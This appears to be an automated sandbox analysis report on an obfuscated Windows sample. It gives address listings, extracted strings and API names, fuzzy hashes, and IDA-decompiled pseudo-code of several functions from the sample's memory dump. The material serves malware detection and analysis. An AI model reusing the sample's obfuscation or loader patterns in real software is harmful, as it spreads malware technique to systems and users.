                                                          0x004f248e
                                                          0x004f2494
                                                          0x004f2495
                                                          0x004f2498
                                                          0x004f2499
                                                          0x004f249f
                                                          0x004f24a2
                                                          0x004f24a6
                                                          0x004f24ab
                                                          0x004f24b2
                                                          0x004f24b8
                                                          0x004f24bf
                                                          0x004f24cb
                                                          0x004f24d9
                                                          0x004f24e3
                                                          0x004f24e8
                                                          0x004f24f5
                                                          0x004f24f7
                                                          0x004f24f7
                                                          0x004f24f5
                                                          0x004f24fe
                                                          0x004f2504
                                                          0x004f250b
                                                          0x004f251e
                                                          0x004f251f
                                                          0x004f2522
                                                          0x004f2528
                                                          0x004f2534
                                                          0x004f253a
                                                          0x004f2554
                                                          0x004f2564
                                                          0x004f256e
                                                          0x004f256f
                                                          0x004f2581
                                                          0x004f2590
                                                          0x004f2598
                                                          0x004f25a7
                                                          0x004f25b6
                                                          0x004f25bd
                                                          0x004f25c3
                                                          0x004f25cc
                                                          0x004f25df
                                                          0x004f25e2
                                                          0x004f25e8
                                                          0x004f25eb
                                                          0x004f25f5
                                                          0x004f25f6
                                                          0x004f25f7
                                                          0x004f25f8
                                                          0x004f25fb
                                                          0x004f2600
                                                          0x004f2608
                                                          0x004f261b
                                                          0x004f261d
                                                          0x004f261d
                                                          0x004f2633
                                                          0x004f263d
                                                          0x004f2654
                                                          0x004f2675
                                                          0x00000000
                                                          0x004f2656
                                                          0x004f2662
                                                          0x004f2677
                                                          0x004f267a
                                                          0x004f2680
                                                          0x004f2688
                                                          0x004f2689
                                                          0x004f2694
                                                          0x004f2697
                                                          0x004f26a1
                                                          0x004f26a8
                                                          0x004f26ad
                                                          0x004f26c2
                                                          0x004f26cd
                                                          0x004f26d3
                                                          0x004f26d3
                                                          0x004f26d9
                                                          0x004f26da
                                                          0x004f26df
                                                          0x004f26e8
                                                          0x004f26ef
                                                          0x004f26f0
                                                          0x004f26f1
                                                          0x004f26f4
                                                          0x004f26f7
                                                          0x004f26ff
                                                          0x004f2701
                                                          0x004f2707
                                                          0x004f2714
                                                          0x004f271b
                                                          0x004f2721
                                                          0x004f273d
                                                          0x004f2751
                                                          0x004f2754
                                                          0x004f2755
                                                          0x004f2756
                                                          0x004f275b
                                                          0x004f27b5
                                                          0x00000000
                                                          0x004f275d
                                                          0x004f2765
                                                          0x004f2773
                                                          0x004f27ba
                                                          0x004f27ba
                                                          0x004f27ce
                                                          0x004f27d7
                                                          0x004f27e1
                                                          0x004f27e5
                                                          0x004f27e9
                                                          0x004f27fb
                                                          0x004f2807
                                                          0x004f2807
                                                          0x004f280d
                                                          0x004f2825
                                                          0x004f2838
                                                          0x004f283f
                                                          0x004f2841
                                                          0x004f2842
                                                          0x004f2847
                                                          0x004f28c1
                                                          0x004f28c1
                                                          0x00000000
                                                          0x004f2849
                                                          0x004f284f
                                                          0x004f2855
                                                          0x004f285c
                                                          0x004f2862
                                                          0x004f2868
                                                          0x004f286d
                                                          0x004f286f
                                                          0x004f286f
                                                          0x004f287d
                                                          0x004f287d
                                                          0x004f2881
                                                          0x004f288e
                                                          0x004f289e
                                                          0x004f28a3
                                                          0x004f28ba
                                                          0x004f28cc
                                                          0x004f28d0
                                                          0x004f28d7
                                                          0x004f28ea
                                                          0x004f28f0
                                                          0x004f28f9
                                                          0x004f28fb
                                                          0x004f28fe
                                                          0x004f290b
                                                          0x004f2913
                                                          0x004f2919
                                                          0x004f291c
                                                          0x004f2923
                                                          0x004f292b
                                                          0x004f292d
                                                          0x004f2934
                                                          0x004f293b
                                                          0x004f2941
                                                          0x004f2943
                                                          0x004f2946
                                                          0x004f294e
                                                          0x004f296a
                                                          0x004f296a
                                                          0x00000000
                                                          0x004f2950
                                                          0x004f2958
                                                          0x004f295f
                                                          0x004f2971
                                                          0x004f2976
                                                          0x004f297b
                                                          0x004f2980
                                                          0x004f2980
                                                          0x004f2965
                                                          0x00000000
                                                          0x004f2965
                                                          0x004f28bc
                                                          0x004f28bc
                                                          0x00000000
                                                          0x004f28bc
                                                          0x004f28ba
                                                          0x004f2847
                                                          0x004f277d
                                                          0x004f2789
                                                          0x004f278c
                                                          0x004f2798
                                                          0x004f279a
                                                          0x004f27a8
                                                          0x004f27aa
                                                          0x00000000
                                                          0x004f27b3
                                                          0x004f275b
                                                          0x004f2664
                                                          0x00000000
                                                          0x004f2673
                                                          0x004f2654
                                                          0x004f23fb
                                                          0x004f2406
                                                          0x00000000
                                                          0x004f240f
                                                          0x00000000
                                                          0x004f23ca
                                                          0x004f23b3
                                                          0x00000000
                                                          0x004f2314
                                                          0x004f22d5
                                                          0x004f2114
                                                          0x004f2120
                                                          0x004f2128
                                                          0x00000000
                                                          0x00000000
                                                          0x004f2134
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N5$8j $B5d$BuildExplicitAccessWithNameA$CIRCoInst.dll$GetTickCount64$RemoveVectoredExceptionHandler$System.Web.DynamicData.dll$V3)$WSearchMigPlugin.dll$api-ms-win-core-sysinfo-l1-1-0.dll$charmap.exe$w<$g!
                                                          • API String ID: 0-1212518677
                                                          • Opcode ID: c48cd4197a1a0f4530921f3ac402bf0c062bc21344f27cdd953558e696aa0ea7
                                                          • Instruction ID: 0565d62878e55a0176d10ffbb799ec1cf8019df23d2908ab38e3cff0af045cf2
                                                          • Opcode Fuzzy Hash: c48cd4197a1a0f4530921f3ac402bf0c062bc21344f27cdd953558e696aa0ea7
                                                          • Instruction Fuzzy Hash: 9A22E3BAB043468FC700DF79ED94AED3BB1EB7A320B08416AC98497763DA790409E755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004D13C5 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 256registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 55%
                                                          			E004D13C5(void* __ebx, signed int __edx, short __esi) {
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t80;
				unsigned char _t83;
				signed int _t90;
				signed int _t92;
				signed int _t94;
				signed int _t98;
				short _t101;
				signed int _t112;
				signed int _t117;
				void* _t144;
				char* _t151;
				unsigned short _t157;
				signed int _t164;
				short _t184;
				signed char _t185;
				signed int _t190;
				signed char _t191;
				intOrPtr _t197;
				signed int _t198;
				short _t205;
				void* _t209;

				_t205 = __esi;
				_t198 = __edx;
				_t184 = 0x63d7;
				_t75 =  *(_t209 - 8);
				 *(_t209 - 8) = _t75;
				if(_t75 < 0x1bc6b7) {
					L3:
					_t198 = _t198 - 0x9d1f;
					 *0x50823c = _t205;
					goto L4;
				} else {
					_t197 =  *0x508136; // 0x4aea
					_t184 = _t197 - 0x65ee;
					if(_t184 > _t184) {
						_t184 = _t184 + _t184;
						if((__edx & 0x00008577) != 0) {
							goto L3;
						}
						L4:
						_t76 =  *0x50afe3; // -68
						 *0x50afe5 = _t76;
					}
				}
				_t77 =  *(_t209 - 8);
				 *(_t209 - 0x44) = _t77;
				 *(_t209 - 8) = _t77;
				_t80 =  *(_t209 - 8);
				if(_t184 <= _t184) {
					_t184 = _t184 - 0x5d4ac9 + 0x6b6f4e;
					 *0x5081a8 = _t198;
					_t198 =  *0x5081f4; // 0xcb00
					 *0x50afe0 =  *0x50afe0 - _t198;
					 *0x508242 =  *0x508242 + _t205;
					if(_t205 != 0) {
						 *0x50afe5 =  *0x50afe5 - _t80;
					}
				}
				 *(_t209 - 8) = _t80;
				 *0x50afdc =  *0x50afdc - 2;
				 *0x508176 = _t184;
				 *(_t209 - 0x40) = _t80;
				 *(_t209 - 8) = _t80;
				L0046426A(_t184, _t205, _t80, _t80);
				_t83 =  *(_t209 - 8);
				_t185 = _t184 + 0x6b27;
				 *0x50817e = _t185;
				if(_t185 != _t185) {
					_t198 = 0x9293;
					 *0x50821a = 0x9293;
					_t205 = _t205 - 0xa6d0fd;
				}
				 *0x50afe3 =  *0x50afe3 + _t83;
				E0050869B = E0050869B + 0xd3a171;
				 *(_t209 - 8) = _t83;
				 *(_t209 - 8) = _t209 - 0x64;
				E004C5BEC(_t209 - 0xffffffffffffe0f3, _t198);
				_t90 =  *(_t209 - 8);
				 *(_t209 - 8) = _t90;
				 *(_t209 - 0xc) =  !_t90;
				_t92 =  *(_t209 - 8);
				_t144 = (_t83 >> _t185) - 0x3824;
				 *(_t209 - 0x14) =  *(_t209 - 0x14) + _t144;
				 *0x508108 =  *0x508108 - _t144;
				 *(_t209 - 0x88) = _t92;
				 *(_t209 - 8) = _t92;
				_t94 =  *(_t209 - 8);
				if((_t144 - _t185 >> _t185) + (_t144 - _t185 >> _t185) <= (_t144 - _t185 >> _t185) + (_t144 - _t185 >> _t185)) {
				}
				 *((intOrPtr*)(_t209 - 0x18)) =  *((intOrPtr*)(_t209 - 0x18)) + _t185;
				 *(_t209 - 8) = _t94;
				if(_t94 == 0x1c) {
				}
				_push( *(_t209 - 0x88));
				_t98 =  *(_t209 - 8);
				_t151 = "WcnEapAuthProxy.dll";
				_t190 = E0050814C; // 0x4487
				 *(_t209 - 8) = _t98;
				if(_t98 - 0x1edf < 0x2ea4) {
					 *0x5080b2 =  *0x5080b2 + _t151;
					 *(_t209 - 0x10) = _t151;
					if(_t151 < _t151) {
						_t190 = 0x5df2;
					}
					 *((intOrPtr*)(_t209 - 0x1c)) =  *((intOrPtr*)(_t209 - 0x1c)) + _t190;
					_t190 =  *0x5081a2; // 0xea53
				}
				 *0x5081ec = _t198;
				_t101 = RegisterClassW(??);
				 *0x5086bf =  *0x5086bf + 0xd3a171;
				 *(_t209 - 8) = _t101;
				_push(_t101);
				E00465A23();
				_t191 = _t190 - 0x61;
				_t157 =  *(_t209 - 0x14) >> _t191;
				 *0x50afda =  *0x50afda - _t157;
				 *(_t209 - 0x10) = _t157;
				 *0x508150 = _t191;
				_t164 =  *(_t209 - 0xc);
				_t112 =  *(_t209 - 8);
				if(_t112 != 0) {
					 *(_t209 - 8) = _t112;
					_t112 =  *(_t209 - 8);
					if(_t164 - 0x34fccf >= 0x3c20) {
						L23:
						 *0x50afe3 = _t112;
						 *0x50afe3 = _t112;
						L24:
						_push(0);
						 *0x50858f = _t112;
						_push(0);
						_push(E004D174A);
						goto ( *0x509aa7);
					}
					 *0x50afdd =  *0x50afdd + 0x6e30;
					if(0x6e30 < 0x6e30) {
						goto L24;
					}
					 *0x5081e6 = 0x8af8;
					 *0x508200 = 0x8af8;
					goto L23;
				}
				 *(_t209 - 8) = _t112;
				_push(0);
				 *0x50afda =  *0x50afda -  *(_t209 - 0x10) - 0x3f5e58;
				_t117 =  *(_t209 - 8);
				_push(0);
				 *(_t209 - 0xc) =  *(_t209 - 0xc) + _t117;
				 *(_t209 - 8) = _t117;
				_push(0x4d1fe4);
				_push(E004A9734);
				return _t117;
			}



























                                                          0x004d13c5
                                                          0x004d13c5
                                                          0x004d13c8
                                                          0x004d13d4
                                                          0x004d13db
                                                          0x004d13e3
                                                          0x004d140d
                                                          0x004d140d
                                                          0x004d1412
                                                          0x00000000
                                                          0x004d13e7
                                                          0x004d13f4
                                                          0x004d13fb
                                                          0x004d1402
                                                          0x004d1404
                                                          0x004d140b
                                                          0x00000000
                                                          0x00000000
                                                          0x004d1419
                                                          0x004d1419
                                                          0x004d141f
                                                          0x004d141f
                                                          0x004d1402
                                                          0x004d142d
                                                          0x004d1430
                                                          0x004d1439
                                                          0x004d144f
                                                          0x004d1456
                                                          0x004d145e
                                                          0x004d1464
                                                          0x004d1471
                                                          0x004d1478
                                                          0x004d147e
                                                          0x004d148f
                                                          0x004d1491
                                                          0x004d1491
                                                          0x004d1499
                                                          0x004d14a7
                                                          0x004d14b8
                                                          0x004d14c6
                                                          0x004d14cd
                                                          0x004d14d0
                                                          0x004d14d5
                                                          0x004d14e5
                                                          0x004d14f2
                                                          0x004d14f7
                                                          0x004d1500
                                                          0x004d1504
                                                          0x004d1508
                                                          0x004d1515
                                                          0x004d1515
                                                          0x004d151b
                                                          0x004d1521
                                                          0x004d152a
                                                          0x004d153d
                                                          0x004d1544
                                                          0x004d1549
                                                          0x004d154f
                                                          0x004d1554
                                                          0x004d1557
                                                          0x004d155a
                                                          0x004d155f
                                                          0x004d1562
                                                          0x004d156b
                                                          0x004d1571
                                                          0x004d1579
                                                          0x004d1585
                                                          0x004d1585
                                                          0x004d158c
                                                          0x004d15a1
                                                          0x004d15a6
                                                          0x004d15a6
                                                          0x004d15bc
                                                          0x004d15d4
                                                          0x004d15d7
                                                          0x004d15de
                                                          0x004d15e5
                                                          0x004d15f0
                                                          0x004d15f2
                                                          0x004d15f9
                                                          0x004d15ff
                                                          0x004d1601
                                                          0x004d1601
                                                          0x004d1605
                                                          0x004d160e
                                                          0x004d160e
                                                          0x004d1615
                                                          0x004d161f
                                                          0x004d162f
                                                          0x004d1636
                                                          0x004d1639
                                                          0x004d163a
                                                          0x004d1652
                                                          0x004d1660
                                                          0x004d1666
                                                          0x004d166c
                                                          0x004d1677
                                                          0x004d16a7
                                                          0x004d16b2
                                                          0x004d16b8
                                                          0x004d16be
                                                          0x004d16d6
                                                          0x004d16de
                                                          0x004d1711
                                                          0x004d1716
                                                          0x004d171c
                                                          0x004d1722
                                                          0x004d172b
                                                          0x004d172d
                                                          0x004d1732
                                                          0x004d1739
                                                          0x004d1744
                                                          0x004d1744
                                                          0x004d16e3
                                                          0x004d16ec
                                                          0x00000000
                                                          0x00000000
                                                          0x004d16fc
                                                          0x004d1703
                                                          0x00000000
                                                          0x004d170a
                                                          0x004d1fa0
                                                          0x004d1faa
                                                          0x004d1fc2
                                                          0x004d1fc8
                                                          0x004d1fcd
                                                          0x004d1fce
                                                          0x004d1fd6
                                                          0x004d1fd9
                                                          0x004d1fde
                                                          0x004d1fe3

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ClassRegister
                                                          • String ID: GetTickCount64$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$wlanmsm.dll
                                                          • API String ID: 2764894006-3848357215
                                                          • Opcode ID: 866197fcd30528828884ecc7270bb0eab287513432df7589e58831ba26d82368
                                                          • Instruction ID: 467c1dacd751d70e67d16d29540b7ae9e91a120f4050c6407bdb3b68b2001e7a
                                                          • Opcode Fuzzy Hash: 866197fcd30528828884ecc7270bb0eab287513432df7589e58831ba26d82368
                                                          • Instruction Fuzzy Hash: 92A14E79E0034A9FCB00DFB8E894AED7FB0EB39310F54506AD885E7312E6745A89DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048CC12 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 170libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0048CD75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 1U/$BuildExplicitAccessWithNameA$EtwEventWriteStartScenario$GetTickCount64$WcnEapAuthProxy.dll$credssp.dll$ddrawex.dll$Nqt
                                                          • API String ID: 190572456-1961191525
                                                          • Opcode ID: 91ab8bbda68f93afdb91d5c51ccf4d98d2a1ded26ea25c0518b420c49c524dd8
                                                          • Instruction ID: c6f00d62763067a06119da5f3fd9feb3e559fe26031c5dc67f6093944690e7b3
                                                          • Opcode Fuzzy Hash: 91ab8bbda68f93afdb91d5c51ccf4d98d2a1ded26ea25c0518b420c49c524dd8
                                                          • Instruction Fuzzy Hash: 2D619C78A043068FCB00EFB8E8D5AED7BF1EB38310F44447A9988D7362D6780949E755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B7495 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 118encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CryptExport
                                                          • String ID: BuildExplicitAccessWithNameA$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$SystemPropertiesComputerName.exe$WindowsCodecs.dll$api-ms-win-core-sysinfo-l1-1-0.dll$nshhttp.dll$u:$wmi.dll
                                                          • API String ID: 3389274496-620182036
                                                          • Opcode ID: f128c7c5d5c34129a15e738a7608bbd595044b0df69b8fa855b23812b14aa214
                                                          • Instruction ID: 42d01b82975dca2bd079c0415e2d83a74664df16ae86bde1ee3f8d05dc6f71df
                                                          • Opcode Fuzzy Hash: f128c7c5d5c34129a15e738a7608bbd595044b0df69b8fa855b23812b14aa214
                                                          • Instruction Fuzzy Hash: E44116B5E0030AAFDB00DFA8C8C5AEDBFF0FB29310F50457AA945EB742D2745A858B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B42E2 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 186encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptDecrypt.ADVAPI32(?), ref: 004B4342
                                                          • CryptDestroyKey.ADVAPI32(?), ref: 004B4547
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Crypt$DecryptDestroy
                                                          • String ID: GetAccessPermissionsForObjectW$RtlImpersonateSelfEx$SystemPropertiesComputerName.exe$ZwLoadKeyEx$_,$api-ms-win-core-rtlsupport-l1-1-0.dll
                                                          • API String ID: 2348474682-1156052112
                                                          • Opcode ID: b1fd4ea236b166e8ea25bc6e1e5eb4adbe73cfbe5da1905c922dffa495b9fd11
                                                          • Instruction ID: 094b9032548fd2773f703aead1438b52eebf400d5412c4c0762a7ce50be06148
                                                          • Opcode Fuzzy Hash: b1fd4ea236b166e8ea25bc6e1e5eb4adbe73cfbe5da1905c922dffa495b9fd11
                                                          • Instruction Fuzzy Hash: 3C61FFB8A003469FCB00DFB9E898ADD7FF1FB78310F1441AAD884D7752D239494A9715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0049868A Relevance: 14.1, Strings: 11, Instructions: 318COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E0049868A() {
				signed char _t60;
				signed char _t62;
				signed char _t64;
				signed char _t65;
				signed char _t66;
				signed char _t75;
				signed char _t76;
				signed char _t83;
				signed char _t85;
				signed char _t95;
				unsigned short _t105;
				void* _t106;
				unsigned short _t107;
				unsigned short _t120;
				void* _t122;
				void* _t129;
				signed int _t176;
				unsigned short _t178;
				short _t189;
				void* _t192;
				void* _t197;
				intOrPtr _t199;
				signed char _t200;
				intOrPtr _t207;
				intOrPtr _t208;
				short _t211;
				signed int _t214;
				signed int _t215;
				unsigned short _t221;
				void* _t224;

				_t105 = 0x3385d0;
				_t60 =  *(_t224 - 8);
				if(0x3385d0 <= 0x3385d0) {
					_t105 =  *(_t224 - 0x10);
					_t176 = 0xfffffffffffff03b;
				}
				 *0x508192 =  *0x508192 + _t176;
				_t199 = _t197 + _t197 + _t197 + _t197;
				_push( *0x508214);
				_t215 =  !_t214;
				 *0x50afe6 = _t60;
				if(_t215 >= 0) {
					 *(_t224 - 8) = _t60;
					_t105 = 0;
					_t176 = _t176 - 0x62f4 - _t199;
					_t199 =  *0x5081e4; // 0x5a9a
					 *0x50afe1 = _t60;
				}
				_t221 = 0xb4ae37;
				 *(_t224 - 8) = _t60;
				_t106 = _t105 - 0x2cd0;
				_t62 =  *(_t224 - 8);
				if(_t106 < 0x3c94) {
					_t106 = _t106 + _t106;
					if(_t106 >= _t176 || _t176 > _t176) {
						 *0x508166 = _t176;
					}
					_t176 =  *0x50819a; // 0x6b8d
					_t199 = 0x8b6d;
				}
				 *0x508200 = _t199;
				_t200 = _t199 + _t199;
				_t107 = _t106 + 0xb6;
				 *0x50afe3 = _t62;
				_push( *0x5080d8);
				 *(_t224 - 8) = _t62;
				_t64 = E00464241(_t200, _t107, 0, 0);
				if(_t107 == _t107) {
					_t107 =  *(_t224 - 0x10);
					_t192 = _t176 - 0x6617;
					 *0x50816e =  *0x50816e - _t192;
					_t176 = _t192 + _t192;
					_t200 =  *0x5081bc; // 0x381a
					if((_t200 & 0x00000090) >= 0) {
						 *0x508208 = _t200;
					}
					 *0x50afe3 = 0xc0;
					_t221 = _t221 - _t215;
					_t215 = _t215 + 0xd3c6dd;
					_t64 = 0x1cdc02;
				}
				 *0x508ad7 = _t107;
				 *0x50813c = _t176;
				_t178 = (_t176 ^ 0x005c8056) - 0x79;
				 *0x5081d8 = _t200;
				_t202 = 0xa636;
				 *0x50afe1 = _t64;
				_t65 =  *(_t224 - 8);
				_push( *0x508044);
				if((_t65 & _t65) == 0) {
					_t178 = _t178 - 0x7b;
					 *0x5081e0 =  *0x5081e0 + 0xa636;
					_t202 = 0x50afe1;
					_t221 = _t221 + 1 >> _t178;
				}
				 *(_t224 - 8) = _t65;
				if(_t65 != 0x23) {
					L18:
					_t178 = _t178 - 0x6a45;
					goto L19;
				} else {
					if("psxdllsvr.dll" < "psxdllsvr.dll") {
						L19:
						 *0x5081ae = _t202;
						_t66 =  *(_t224 - 8);
						_push( *0x5081ee);
						 *0x50afe6 =  *0x50afe6 + _t66;
						 *0x50afe6 = _t66;
						 *(_t224 - 8) = _t66;
						 *0x508188 = (_t178 >> _t178) - 1;
						_t181 = 0;
						_t205 =  &(_t202[0x91b1]) - 0xffffffffff88a9a9;
						 *0x508206 =  &(_t202[0x91b1]) - 0xffffffffff88a9a9;
						if(("RtlImpersonateSelfEx" & 0x0000004f) + 0x4ce8ca < 0x38) {
							 *(_t224 - 0x10) =  *(_t224 - 0x10);
							 *0x508138 = 0;
							_t181 = 0;
						}
						 *0x50afdf =  *0x50afdf - _t181;
						E00464241(_t205, _t205, _t205, _t205);
						_t207 =  *0x50820a; // 0x8e68
						_t120 =  *0x508ae7;
						_t75 =  *(_t224 - 8);
						_push( *0x508050);
						 *(_t224 - 8) = _t75;
						if(_t75 > 0x23) {
							_t120 = 0x4283c3;
							 *(_t224 - 0x10) = 0x4283c3;
							_t181 = 0x69b3;
							 *0x5081ac = _t207;
						}
						_t208 = _t207 - 0x911f;
						E00508230 = _t221;
						_t76 =  *(_t224 - 8);
						_t122 = (_t120 >> _t181) + _t76;
						_push( *0x508044);
						if(_t181 >= _t181) {
							_t181 = 0;
							if(0 >= 0) {
								 *0x50819a =  *0x50819a;
							}
							_t208 =  *0x508200; // 0x7ac4
							 *0x50afe1 = _t76;
							_t221 = 0;
						}
						_t222 = _t221 + 0xbc99e7;
						 *0x50afe5 =  *0x50afe5 + _t76;
						_push( *0x5081da);
						 *(_t224 - 8) = _t76;
						E004650DC(_t122, _t181, _t208, 0, _t221 + 0xbc99e7, 0);
						 *((intOrPtr*)(_t224 - 0xc)) = 0x508099;
						_t83 =  *(_t224 - 8);
						_t129 =  *((intOrPtr*)(_t224 - 0xc)) - 0x51;
						 *(_t224 - 8) = _t83;
						if(_t83 <= 0x1ea54f) {
							 *(_t224 - 0x10) = 0xffffffffffffbe4b;
							_t129 = 0;
						}
						 *0x5081aa = 0x7da6;
						_t85 = E005007C9(_t129, _t222);
						 *0x50afe3 = _t85;
						 *0x50afe6 = _t85;
						 *(_t224 - 8) = _t85;
						 *((intOrPtr*)(_t224 - 0xc)) = 0x2f9971;
						 *0x508182 = 0x6461;
						_t189 =  *0x5081b8; // 0x0
						 *0x508204 = 0x7da5;
						 *0x50821c = 0x7da5;
						 *0x508134 = _t189;
						_t95 =  *(_t224 - 8);
						 *(_t224 - 0x2c) = _t95;
						 *(_t224 - 8) = _t95;
						 *((intOrPtr*)(_t224 - 0xc)) =  *((intOrPtr*)(_t224 - 0xc)) + 0x317930;
						 *0x50afda =  *0x50afda - 0x317930;
						 *0x508160 = _t189;
						_t211 =  *0x5081ac; // 0x9f6d
						 *0x5081fa = _t211;
						_push( *(_t224 - 0x2c));
						_push(0x317930);
						_push( !0xFFFFFFFFFFFFFFBC);
						_push(1);
						_push(E00498B48);
						goto __ebx;
					}
					goto L18;
				}
			}

































                                                          0x0049868a
                                                          0x0049868f
                                                          0x00498695
                                                          0x00498697
                                                          0x0049869e
                                                          0x0049869e
                                                          0x004986a3
                                                          0x004986ad
                                                          0x004986af
                                                          0x004986bb
                                                          0x004986bd
                                                          0x004986c4
                                                          0x004986cd
                                                          0x004986dc
                                                          0x004986e6
                                                          0x004986eb
                                                          0x004986f2
                                                          0x004986f2
                                                          0x004986fb
                                                          0x00498701
                                                          0x00498709
                                                          0x0049870e
                                                          0x00498716
                                                          0x00498718
                                                          0x0049871d
                                                          0x00498723
                                                          0x00498723
                                                          0x0049872a
                                                          0x00498731
                                                          0x00498731
                                                          0x00498735
                                                          0x0049873c
                                                          0x0049873f
                                                          0x00498742
                                                          0x00498748
                                                          0x0049874f
                                                          0x0049875b
                                                          0x00498762
                                                          0x00498767
                                                          0x0049876a
                                                          0x0049876f
                                                          0x00498776
                                                          0x00498779
                                                          0x00498783
                                                          0x00498785
                                                          0x00498785
                                                          0x00498797
                                                          0x0049879d
                                                          0x004987a2
                                                          0x004987af
                                                          0x004987af
                                                          0x004987b4
                                                          0x004987c5
                                                          0x004987d2
                                                          0x004987d5
                                                          0x004987e6
                                                          0x004987ea
                                                          0x004987f0
                                                          0x004987f3
                                                          0x004987fc
                                                          0x00498824
                                                          0x0049882d
                                                          0x00498837
                                                          0x0049883e
                                                          0x00498843
                                                          0x0049884b
                                                          0x00498850
                                                          0x00498865
                                                          0x00498865
                                                          0x00000000
                                                          0x00498852
                                                          0x00498860
                                                          0x0049886a
                                                          0x0049886a
                                                          0x00498877
                                                          0x0049887a
                                                          0x0049888a
                                                          0x00498890
                                                          0x004988a0
                                                          0x004988ca
                                                          0x004988d1
                                                          0x004988d3
                                                          0x004988d9
                                                          0x004988eb
                                                          0x004988f4
                                                          0x004988f7
                                                          0x004988fe
                                                          0x004988fe
                                                          0x00498901
                                                          0x0049890a
                                                          0x00498911
                                                          0x00498926
                                                          0x0049892c
                                                          0x0049892f
                                                          0x00498936
                                                          0x0049893b
                                                          0x00498942
                                                          0x00498947
                                                          0x0049894c
                                                          0x00498950
                                                          0x00498950
                                                          0x00498957
                                                          0x0049895c
                                                          0x00498963
                                                          0x00498969
                                                          0x0049896b
                                                          0x00498975
                                                          0x00498977
                                                          0x0049897c
                                                          0x0049897e
                                                          0x0049897e
                                                          0x0049898a
                                                          0x00498991
                                                          0x00498997
                                                          0x00498997
                                                          0x00498999
                                                          0x0049899f
                                                          0x004989a8
                                                          0x004989af
                                                          0x004989bb
                                                          0x004989e3
                                                          0x004989f9
                                                          0x00498a03
                                                          0x00498a06
                                                          0x00498a0e
                                                          0x00498a1e
                                                          0x00498a21
                                                          0x00498a21
                                                          0x00498a2d
                                                          0x00498a34
                                                          0x00498a39
                                                          0x00498a47
                                                          0x00498a57
                                                          0x00498a74
                                                          0x00498a80
                                                          0x00498a87
                                                          0x00498a8f
                                                          0x00498a96
                                                          0x00498ab3
                                                          0x00498ad2
                                                          0x00498ad5
                                                          0x00498ad8
                                                          0x00498ae0
                                                          0x00498ae3
                                                          0x00498af7
                                                          0x00498b07
                                                          0x00498b0e
                                                          0x00498b2d
                                                          0x00498b38
                                                          0x00498b39
                                                          0x00498b3a
                                                          0x00498b3c
                                                          0x00498b46
                                                          0x00498b46
                                                          0x00000000
                                                          0x00498860

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0y1$CIRCoInst.dll$CNHMWL.dll$DismHost.exe$RemoveVectoredExceptionHandler$RtlImpersonateSelfEx$WindowsCodecs.dll$credssp.dll$ddrawex.dll$f4$psxdllsvr.dll
                                                          • API String ID: 0-3357394030
                                                          • Opcode ID: 2ba5d1d900ca38b171a3d558b219322ac038d3699f07e8afda3ef3be2b058dde
                                                          • Instruction ID: 4a1e1e3463f3c094ae8cff2f5e94ea0d0184ce2aace1860d8fe72a36a84fe7ad
                                                          • Opcode Fuzzy Hash: 2ba5d1d900ca38b171a3d558b219322ac038d3699f07e8afda3ef3be2b058dde
                                                          • Instruction Fuzzy Hash: C8C19D79A547069FCB00DFB9E894AED7BB0FF39314F04407E9984A7352EA780949D70A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B6340 Relevance: 13.9, Strings: 11, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
